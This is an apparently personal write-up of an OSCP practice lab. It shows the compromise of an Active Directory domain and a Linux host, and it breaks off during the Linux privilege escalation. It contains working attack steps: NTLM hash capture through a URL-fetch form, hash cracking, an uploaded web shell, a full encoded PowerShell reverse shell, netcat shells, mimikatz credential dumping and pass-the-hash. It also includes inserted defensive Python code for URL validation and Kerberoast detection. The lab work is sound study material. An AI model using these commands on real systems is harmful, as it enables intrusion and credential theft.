
OSCP B

Network

IP                               NAME    ORDER  STATUS
10.10.140.146                    DC01    3      OWNED
192.168.180.147 / 10.10.140.147  MS01    1      OWNED
10.10.140.148                    MS02    2      OWNED
192.168.199.149                  Kiero   4      OWNED
192.168.149.150                  Berlin  5      OWNED
192.168.149.151                  Gust    6      OWNED

Objectives

This is the second of three dedicated OSCP Challenge Labs. It is composed of six OSCP machines. The intention of this Challenge is to provide a mock-exam experience that closely reflects a similar level of difficulty to that of the actual OSCP exam.

The challenge contains three machines that are connected via Active Directory, and three standalone machines that do not have any dependencies or intranet connections. All the standalone machines have a local.txt and a proof.txt, however the Active Directory set only has a proof.txt on the Domain Controller. While the Challenge Labs have no point values, on the exam the standalone machines would be worth 20 points each for a total of 60 points. The Active Directory set is worth 40 points all together, and the entire domain must be compromised to achieve any points for it at all.

All the intended attack vectors for these machines are taught in the PEN-200 Modules, or are leveraged in PEN-200 Challenge Labs 1-3. However, the specific requirements to trigger the vulnerabilities may differ from the exact scenarios and techniques demonstrated in the course material. You are expected to be able to take the demonstrated exploitation techniques and modify them for the current environment.

Please feel free to complete this challenge at your own pace. While the OSCP exam lasts for 23:45 hours, it is designed so that the machines can be successfully attacked in much less time. While each student is different, we highly recommend that you plan to spend a significant amount of time resting, eating, hydrating, and sleeping during your exam. Thus, we explicitly do not recommend that you attempt to work on this Challenge Lab for 24 hours straight.

We recommend that you begin with a network scan on all the provided IP addresses, and then enumerate each machine based on the results. When you are finished with the Challenge, we suggest that you create a mock-exam report for your own records, according to the advice provided in the Report Writing for Penetration Testers Module.

Good luck!

Credentials

Recovered credentials:

  • web_svc:Diamond1
  • sql_svc:Dolphin1

DC01

Enumeration

Exploit

I log in via Evil-WinRM using the Administrator hash found on MS02:

PowerShell
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ evil-winrm -i 10.10.140.146 -u Administrator -H '59b280ba707d22e3ef0aa587fc29ffe5'

Privilege Escalation

I open an interactive shell through the port forward set up on MS01:

PowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e 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

The shell comes back as Administrator on my Kali machine:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566    
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49263

PS C:\Users\Administrator\Documents> whoami
oscp\administrator

Finally I grab the proof.txt flag:

001.png


MS01

Enumeration

PORT       SERVICE       VERSION  NOTES
21/tcp     ftp                    FTP
22/tcp     ssh                    SSH
135/tcp    msrpc                  MSRPC
139/tcp    netbios-ssn            SMB
445/tcp    microsoft-ds           SMB
5040/tcp   unknown
5985/tcp   wsman                  OMI
8000/tcp   http-alt
8443/tcp   https-alt
47001/tcp  winrm                  WINRM

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.180.147      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 15:30 CET
Nmap scan report for 192.168.180.147
Host is up (0.074s latency).
Not shown: 65516 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5985/tcp  open  wsman
8000/tcp  open  http-alt
8080/tcp  open  http-proxy
8443/tcp  open  https-alt
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p21,22,135,139,445,5040,5985,8000,8080,8443,47001 -oN alltcp.txt 192.168.180.147 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 15:32 CET
Nmap scan report for 192.168.180.147
Host is up (0.070s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 e0:3a:63:4a:07:83:4d:0b:6f:4e:8a:4d:79:3d:6e:4c (RSA)
|   256 3f:16:ca:33:25:fd:a2:e6:bb:f6:b0:04:32:21:21:0b (ECDSA)
|_  256 fe:b0:7a:14:bf:77:84:9a:b3:26:59:8d:ff:7e:92:84 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: IIS Windows
8080/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn: 
|_  http/1.1
|_ssl-date: 2025-01-04T14:35:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=MS01.oscp.exam
| Subject Alternative Name: DNS:MS01.oscp.exam
| Not valid before: 2022-11-11T07:04:43
|_Not valid after:  2023-11-10T00:00:00
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-01-04T14:35:13
|_  start_date: N/A

Port 8000

002.png

Port 8080

003.png

Port 8443

004.png

I add the hostname for 192.168.180.147 to /etc/hosts:

005.png

Exploit

The form at http://ms02.oscp.exam:8443 has a url field that appears to fetch whatever URL it is given. I start Responder on my machine:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo responder -I tun0            
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0
[...]

I fill in the form fields and, in the url field, make it request \\\\192.168.45.248\momphucker.

Responder captures the connection together with the NTLMv2 hash:

Bash
[...]
[SMB] NTLMv2-SSP Client   : 192.168.180.147
[SMB] NTLMv2-SSP Username : OSCP\web_svc
[SMB] NTLMv2-SSP Hash     : web_svc::OSCP:83914b0b64228a0d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
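The capture above works because the application fetches any URL it is handed, so a UNC path makes the IIS worker authenticate outbound as web_svc. As an added example (not code from the write-up or from the lab application), this is the server-side validation that closes that hole: only http(s) URLs with a plain hostname are accepted, backslash/UNC forms, file: and scheme-relative inputs are rejected, and literal private or loopback addresses are refused unless explicitly allowed. The function name and rules are this example's own.

```python
"""Validate a user-supplied URL before a server-side fetch (added example)."""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def validate_fetch_url(raw, allow_private=False):
    """Return (ok, reason). ok is True only for an http(s) URL with a hostname.

    UNC paths (\\\\host\\share), file://, ftp:// and scheme-relative //host forms
    are rejected; so are embedded credentials and, by default, literal private
    or loopback target addresses.
    """
    if not isinstance(raw, str) or not raw.strip():
        return False, "empty url"
    # Backslashes never belong in a web URL; .NET's Uri class happily treats
    # "\\host\share" as a UNC file path, so refuse them before parsing.
    if "\\" in raw:
        return False, "backslash in url (UNC-style path)"
    parts = urlsplit(raw.strip())
    # urlsplit lowercases the scheme; a schemeless "//host/share" yields ''.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme or '(none)'}"
    if not parts.hostname:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in url"
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        ip = None  # a DNS name: the resolved address must be checked at fetch time too
    if ip is not None and not allow_private and (
        ip.is_private or ip.is_loopback or ip.is_link_local
    ):
        return False, f"target address not allowed: {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: the UNC value used above plus a few ordinary cases.
    for candidate in ["http://example.com/status",
                      "\\\\192.168.45.248\\momphucker",
                      "//192.168.45.248/share",
                      "file:///etc/passwd",
                      "http://192.168.45.248/"]:
        print(candidate, "->", validate_fetch_url(candidate))
```

Rejecting the request before any fetch also removes the outbound NTLM authentication attempt entirely, which is a stronger fix than cracking resistance (a long web_svc password) alone.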

I save the hash to hashes.txt and crack it with hashcat:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
[...]

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ cat cracked.txt              
WEB_SVC::OSCP:83914b0b64228a0d:4c694198700fd590d3fd13666d568093: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:Diamond1

Credentials found: web_svc:Diamond1

The credentials do not seem to work for Evil-WinRM, but they are valid for FTP:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ftp 192.168.180.147                       
Connected to 192.168.180.147.
220 Microsoft FTP Service
Name (192.168.180.147:momphucker): web_svc
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||58997|)
125 Data connection already open; Transfer starting.
11-13-22  11:17PM       <DIR>          aspnet_client
11-10-22  03:53AM       <DIR>          custerr
11-10-22  11:12PM       <DIR>          ftproot
11-14-22  12:36AM       <DIR>          history
11-10-22  11:16PM       <DIR>          logs
11-13-22  11:17PM       <DIR>          pportal
11-10-22  03:53AM       <DIR>          temp
12-01-22  03:26AM       <DIR>          wwwroot
226 Transfer complete.
ftp> 

I download the files locally for easier inspection:

Info

Not needed in this case, but all files and folders could be downloaded with the following command:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ wget -r -l 0 ftp://web_svc:Diamond1@192.168.180.147/*
[...]

The wwwroot directory holds the files served by the web service on port 8000. I upload an ASPX command shell:

Text Only
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
229 Entering Extended Passive Mode (|||59183|)
125 Data connection already open; Transfer starting.
100% |*******************************|  1442       34.37 MiB/s    --:-- ETA
226 Transfer complete.
1442 bytes sent in 00:00 (19.51 KiB/s)
ftp>

And call it through the service on port 8000:

006.png

I open a listener on port 4466 and run a base64-encoded PowerShell reverse shell from the command shell:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc -nvlp 4466                           
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 59184

PS C:\windows\system32\inetsrv> whoami 
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

Privilege Escalation

I try to abuse SeImpersonatePrivilege.

I upload the necessary files to C:\users\public\documents and run them to get a reverse shell as SYSTEM on port 4466:

PowerShell
PS C:\users\public\documents\wintools> .\PrintSpoofer64.exe -c ".\nc.exe 192.168.45.248 4466 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc -nvlp 4466   
listening on [any] 4466 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 59192
Microsoft Windows [Version 10.0.19044.2251]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

This machine has no flags to capture.

Post Privilege Escalation

I check that I can reach the domain, so that SharpHound can be used:

PowerShell
C:\Users\Public\Documents\wintools>net user /domain
net user /domain
The request will be processed at a domain controller for domain oscp.exam.


User accounts for \\DC01.oscp.exam

-------------------------------------------------------------------------------
Administrator            Aimee.Hunt               Carol.Webb               
celia.almeda             Chelsea.Byrne            Donna.Johnson            
Emily.Bishop             Frank.Farrell            Georgina.Begum           
Guest                    Jamie.Thomas             Jane.Booth               
Janice.Turner            Joan.North               john.dorian              
Kenneth.Coles            krbtgt                   Lawrence.Kay             
Leonard.Morris           Linda.Patel              Luke.Martin              
Oliver.Gray              Sandra.Craig             Shane.Mitchell           
sql_svc                  Thomas.Robinson          tom.kinney               
tom_admin                web_svc                  
The command completed with one or more errors.

I run the collector to produce the file to load into BloodHound:

PowerShell
C:\Users\Public\Documents\wintools>Sharphound.exe -c all,gpolocalgroup

I transfer the file to my machine:

PowerShell
C:\Users\Public\Documents\wintools>.\nc.exe 192.168.45.248 1234 < 20250104073757_BloodHound.zip

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/OSCP_B/ftp]
└─$ nc  -lvp 1234 > 20250104073757_BloodHound.zip

I change the Administrator password for easier access to the machine over SSH:

PowerShell
C:\Users\Public\Documents\wintools>net user Administrator Aa.123456!

As SYSTEM I run Rubeus to Kerberoast:

PowerShell
C:\Users\Public\Documents\wintools>Rubeus.exe kerberoast /outfile:hashes.kerberoast

I copy hashes.kerberoast locally and check its contents:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ cat hashes.kerberoast        
$krb5tgs$23$*sql_svc$oscp.exam$MSSQL/MS02.oscp.exam@oscp.exam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
$krb5tgs$23$*web_svc$oscp.exam$HTTP/MS01.oscp.exam@oscp.exam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

I crack the hashes:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

New credentials recovered: sql_svc:Dolphin1
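The `$krb5tgs$23$` prefix on the roasted hashes above means the service tickets were issued with RC4-HMAC (etype 23, logged as Ticket Encryption Type 0x17 in Windows Security event 4769), which is what makes them crackable offline. As an added example, not part of the write-up, the function below runs the corresponding detection over constructed 4769 records: one requester obtaining RC4 tickets for several SPN-bearing user accounts within a short window. The record layout (plain dicts with account, service, etype, client and status fields) is a simplification of the real event XML and is this example's assumption.

```python
"""Flag possible Kerberoasting in Windows Security event 4769 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: the "23" in "$krb5tgs$23$..." lines of hashes.kerberoast

# Constructed sample events (not real log data), shaped like 4769 fields.
SAMPLE_4769 = [
    # ordinary traffic: AES ticket to a machine account, TGT renewal against krbtgt
    {"time": "2025-01-04T16:38:12", "account": "Aimee.Hunt@OSCP.EXAM", "service": "DC01$",
     "etype": 0x12, "client": "10.10.140.150", "status": "0x0"},
    {"time": "2025-01-04T16:39:03", "account": "MS02$@OSCP.EXAM", "service": "krbtgt",
     "etype": 0x17, "client": "10.10.140.148", "status": "0x0"},
    # one legacy RC4 service ticket from a user: noisy, but below the threshold
    {"time": "2025-01-04T16:39:40", "account": "Carol.Webb@OSCP.EXAM", "service": "sql_svc",
     "etype": 0x17, "client": "10.10.140.151", "status": "0x0"},
    # the pattern a Rubeus kerberoast run leaves: one requester, RC4, several user SPNs, seconds apart
    {"time": "2025-01-04T16:40:01", "account": "MS01$@OSCP.EXAM", "service": "sql_svc",
     "etype": 0x17, "client": "10.10.140.147", "status": "0x0"},
    {"time": "2025-01-04T16:40:02", "account": "MS01$@OSCP.EXAM", "service": "web_svc",
     "etype": 0x17, "client": "10.10.140.147", "status": "0x0"},
    # a failed request must not count towards the threshold
    {"time": "2025-01-04T16:40:03", "account": "MS01$@OSCP.EXAM", "service": "tom_admin",
     "etype": 0x17, "client": "10.10.140.147", "status": "0x1B"},
]


def is_roastable_service(name):
    """Machine accounts (trailing $) and krbtgt are normal Kerberos traffic;
    user accounts holding SPNs are what Kerberoasting targets."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def kerberoast_candidates(events, window=timedelta(minutes=10), min_services=2):
    """Return one alert per (requesting account, client IP) that obtained successful
    RC4 service tickets for at least min_services distinct user accounts within window."""
    by_requester = defaultdict(list)
    for ev in events:
        if ev["status"] != "0x0" or ev["etype"] != RC4_HMAC:
            continue
        if not is_roastable_service(ev["service"]):
            continue
        ts = datetime.fromisoformat(ev["time"])
        by_requester[(ev["account"], ev["client"])].append((ts, ev["service"]))

    alerts = []
    for (account, client), reqs in by_requester.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):               # sliding window over sorted requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            services = {svc for _, svc in reqs[start:end + 1]}
            if len(services) >= min_services:
                alerts.append({"account": account, "client": client,
                               "services": sorted(services)})
                break                                # one alert per requester is enough
    return alerts


if __name__ == "__main__":
    for alert in kerberoast_candidates(SAMPLE_4769):
        print(f"possible Kerberoast: {alert['account']} from {alert['client']} "
              f"requested RC4 tickets for {', '.join(alert['services'])}")
```

The threshold deliberately ignores a single RC4 ticket, since legacy services still produce those; the mitigation that removes the signal altogether is long random passwords on service accounts and AES-only ticket encryption for them, after which `$krb5tgs$23$` lines no longer appear.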


MS02

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_ms02.txt 10.10.140.148  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 17:26 CET
Stats: 0:05:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 65.36% done; ETC: 17:33 (0:02:42 remaining)
Nmap scan report for 10.10.140.148
Host is up (0.10s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5040/tcp  open  unknown
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49700/tcp open  unknown

Exploit

I use the sql_svc:Dolphin1 credentials to log in with Impacket's mssqlclient:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ impacket-mssqlclient sql_svc@10.10.140.148 -windows-auth

Then I run enable_xp_cmdshell and xp_cmdshell whoami:

SQL
SQL (OSCP\sql_svc  dbo@master)> enable_xp_cmdshell
[*] INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc  dbo@master)> xp_cmdshell whoami
output                        
---------------------------   
nt service\mssql$sqlexpress   

NULL                          

SQL (OSCP\sql_svc  dbo@master)>

Privilege Escalation

At this point I can execute commands.

I start a listener on MS01 at 10.10.140.147:4466 and run:

SQL
SQL (OSCP\sql_svc  dbo@master)> xp_cmdshell powershell -e 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

I check the privileges:

PowerShell
PS C:\Windows\system32> whoami                                          
nt service\mssql$sqlexpress

PS C:\Windows\system32> whoami /priv 

PRIVILEGES INFORMATION                                                          
----------------------                                                          

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

I can abuse SeImpersonatePrivilege.

Info

On MS01 I add a port-forwarding rule so that I can connect directly back to my Kali machine:

PowerShell
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=5555 connectaddress=192.168.45.248 connectport=5555

I open a listener on Kali:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5555

And from MS02 I open the shell, connecting to 10.10.140.147:5555

PowerShell
PS C:\> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AC
AAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdA
AoACIAMQAwAC4AMQAwAC4AMQA0ADAALgAxADQANwAiACwANQA1ADUANQApADsAJABzAHQAcgBlAG
EAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdA
BlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AG
gAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQ
BzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAH
sAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQ
BtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnAC
kALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQ
BuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAH
UAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbg
BkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArAC
AAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbw
BkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAG
IAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdA
BlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG
0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49243

PS C:\> whoami
nt service\mssql$sqlexpress

I add another port-forwarding rule on MS01 for traffic on port 5566, then open a shell with PrintSpoofer, abusing SeImpersonatePrivilege:

PowerShell
PS C:\Temp> .\PrintSpoofer64.exe -c "c:\temp\nc.exe 10.10.140.147 5566 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
PS C:\Temp> 

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ nc -nvlp 5566
listening on [any] 5566 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.180.147] 49256
Microsoft Windows [Version 10.0.19042.1586]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

I run mimikatz to look for interesting hashes:

PowerShell
C:\Temp>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

And I find the domain Administrator's hash:

PowerShell
Authentication Id : 0 ; 382174 (00000000:0005d4de)                                                             
Session           : Interactive from 1                                                                         
User Name         : Administrator                                                                              
Domain            : OSCP
Logon Server      : DC01
Logon Time        : 12/7/2024 9:16:10 AM
SID               : S-1-5-21-2610934713-1581164095-2706428072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : OSCP
         * NTLM     : 59b280ba707d22e3ef0aa587fc29ffe5
         * SHA1     : f41a495e6d341c7416a42abd14b9aef6f1eb6b17
         * DPAPI    : 959ad2ea78c63aebf3233679ad90d769
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : OSCP
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : OSCP.EXAM
         * Password : (null)
        ssp :
        credman :
        cloudap :

At this point I try to connect to the DC over WinRM.


Kiero

Enumeration

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -p- -oN alltcp_ports_kiero.txt 192.168.199.149
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 09:46 CET
Nmap scan report for 192.168.199.149
Host is up (0.075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ sudo nmap -Pn -sC -sV -p21,22,80 -oN alltcp_kiero.txt 192.168.199.149
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 09:47 CET
Nmap scan report for 192.168.199.149
Host is up (0.068s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5c:5f:f1:bb:02:f9:14:7c:8e:38:32:2b:f4:bc:d0:8c (RSA)
|   256 18:e2:47:e1:c8:40:a1:d0:2c:a5:87:97:bd:01:12:27 (ECDSA)
|_  256 26:2d:98:d9:47:6d:22:5d:4a:14:7a:24:5c:98:a2:1d (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Port 21

I log in to FTP with the credentials kiero:kiero:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ftp 192.168.199.149
Connected to 192.168.199.149.
220 (vsFTPd 3.0.3)
Name (192.168.199.149:momphucker): kiero
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||10100|)
150 Here comes the directory listing.
-rwxr-xr-x    1 114      119          2590 Nov 21  2022 id_rsa
-rw-r--r--    1 114      119           563 Nov 21  2022 id_rsa.pub
-rwxr-xr-x    1 114      119          2635 Nov 21  2022 id_rsa_2
226 Directory send OK.
ftp>

Port 80

007.png

Exploit

I copy the files found on the FTP server into Kali's .ssh folder and set the correct permissions:

Bash
sudo chmod 700 ~/.ssh && \
sudo chmod -R 600 ~/.ssh/* && \
sudo chmod -R 644 ~/.ssh/*.pub

I check id_rsa.pub to find out which user the key belongs to:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/.ssh]
└─$ cat id_rsa.pub 
ssh-rsa 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 john@oscp

And log in over SSH:

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/OSCP_B]
└─$ ssh -l john 192.168.199.149
Last login: Tue Nov 22 08:31:27 2022 from 192.168.118.3
john@oscp:~$

Privilege Escalation

In john's home directory there is an unusual executable, RESET_PASSWD, owned by root and executable by john as well.

Bash
john@oscp:~$ ll
total 916
drwxr-xr-x 6 john john   4096 Jan  5 09:03 ./
drwxr-xr-x 4 root root   4096 Nov 17  2022 ../
lrwxrwxrwx 1 root root      9 Nov 21  2022 .bash_history -> /dev/null
-rw-r--r-- 1 john john    220 Feb 25  2020 .bash_logout
